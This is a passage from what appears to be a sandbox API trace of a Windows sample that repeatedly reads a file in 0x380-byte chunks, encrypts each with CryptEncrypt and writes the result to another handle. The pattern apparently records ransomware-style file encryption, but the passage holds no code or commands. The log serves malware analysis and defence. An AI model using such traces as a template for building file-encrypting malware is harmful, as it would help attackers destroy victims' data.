pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.620] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.620] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.620] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.620] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.620] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.620] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.620] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.621] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.621] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.621] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.621] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.621] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.621] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.621] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.621] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.621] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.621] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.621] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.621] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.622] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.622] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.622] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.622] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.622] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.622] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.622] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.622] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.622] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.622] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.622] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.622] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.622] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.623] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.623] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.623] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.623] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.623] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.623] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.623] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.623] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.623] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.623] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.623] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.623] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.623] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.623] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.624] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.624] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.624] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.624] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.624] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.624] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.624] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.624] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.624] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.624] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.624] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.624] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.625] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.625] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.625] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.625] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.625] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.625] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.625] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.625] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.625] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.625] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.625] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.625] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.626] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.626] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.626] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.626] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.626] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.626] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.626] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.626] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.626] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.626] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.626] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.626] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.627] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.627] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.627] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.627] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.627] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.627] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.627] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.627] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.627] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.627] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.627] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.627] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.628] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.628] CryptEncrypt (in: hKey=0x2fc908, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.628] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, 